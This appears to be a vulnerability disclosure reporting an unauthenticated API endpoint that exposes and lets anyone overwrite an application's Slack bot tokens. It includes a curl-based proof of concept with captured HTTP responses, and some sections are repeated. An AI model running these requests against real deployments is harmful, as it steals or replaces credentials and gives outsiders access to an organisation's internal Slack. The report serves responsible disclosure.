Summary
Unauth GET/SET of Slack Bot Tokens, anyone with network access can steal slack bot tokens, and set some. This implies full compromise of the customer's slack bot, leading to scary internal slack access... 😓
FYI, many instances (quick shodan scan) are already vulnerable to this
Details & PoC
alias crli='curl -sSkiL'
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens -X PUT -H 'Content-Type: application/json' --data-binary '{"app_token": "aaaa", "bot_token": "aaaa"}'
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 404
# date: Mon, 08 Apr 2024 10:34:16 GMT
# content-type: application/json
# content-length: 28
# server: istio-envoy
# x-envoy-upstream-service-time: 3
#
# {
# "detail": "No tokens found"
# }
# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 200
# date: Mon, 08 Apr 2024 10:34:18 GMT
# content-type: application/json
# content-length: 39
# server: istio-envoy
# x-envoy-upstream-service-time: 5
#
# {
# "bot_token": "aaaa",
# "app_token": "aaaa"
# }
Impact
"Pretty big impact" aka "Slack access from WWW" aka "We're f*ed!"
Note
I checked and it seems that there's no path from ARBITRARY TOKENS SET to ADMIN XSS, which is nice as there are way more critical issues in the admin side, more on this in the next issue!
Have a nice day! 🌹
Summary
Unauth GET/SET of Slack Bot Tokens, anyone with network access can steal slack bot tokens, and set some. This implies full compromise of the customer's slack bot, leading to scary internal slack access... 😓
FYI, many instances (quick shodan scan) are already vulnerable to this
Details & PoC
Impact
"Pretty big impact" aka "Slack access from WWW" aka "We're f*ed!"
Note
I checked and it seems that there's no path from ARBITRARY TOKENS SET to ADMIN XSS, which is nice as there are way more critical issues in the admin side, more on this in the next issue!
Have a nice day! 🌹